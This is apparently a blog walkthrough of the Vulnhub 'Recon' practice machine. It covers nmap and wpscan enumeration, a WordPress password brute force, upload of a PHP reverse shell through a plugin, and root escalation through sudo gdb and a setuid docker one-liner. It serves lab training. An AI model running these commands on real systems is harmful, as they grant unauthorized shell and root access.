Vulnhub – Recon Walkthrough

We start with nmap –A –T4 –p- 192.168.1.15 –vv

Port 80 is open we can see it’s a WordPress site, so we run wpscan –url http://192.168.1.15 -e u

Now before we start to brute force i found a file named hack.zip in the uploads directory

I’ve download the file to my machine and took a look inside it and it looks like a php script to gain a shell to the target machine it even has the ip of my machine and the port 4545 going to change th port to 4444 and save it for now:

Now we brute force the WordPress with wpscan –url http://192.168.1.15 -U reconauthor -P /root/pass/rockyou.txt  and we get the password:

Username: reconauthor password: football7

In the post section we can see there’s a post called “add playload”

Im going to upload the file i found and name it to hack2.zip and put a file named index.html with it inside to be able to upload it without any errors:

Ok got some kind of problem, the file i found hack.zip has a timout so im going to upload my own shell and visit the link 192.168.1.15//wp-content/uploads/articulate_uploads/shell/shell.php

Now the user www-data can do sudo:

sudo -u offensivehack gdb -nx -ex ‘!sh’ -ex quit

The user offensivehack is part of  docker  that we can priv from here:

sh -c ‘cp $(which docker) .; chmod +s ./docker’

./docker run -v /:/mnt –rm -it alpine chroot /mnt sh

now we catch the flag which is in /root directory:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s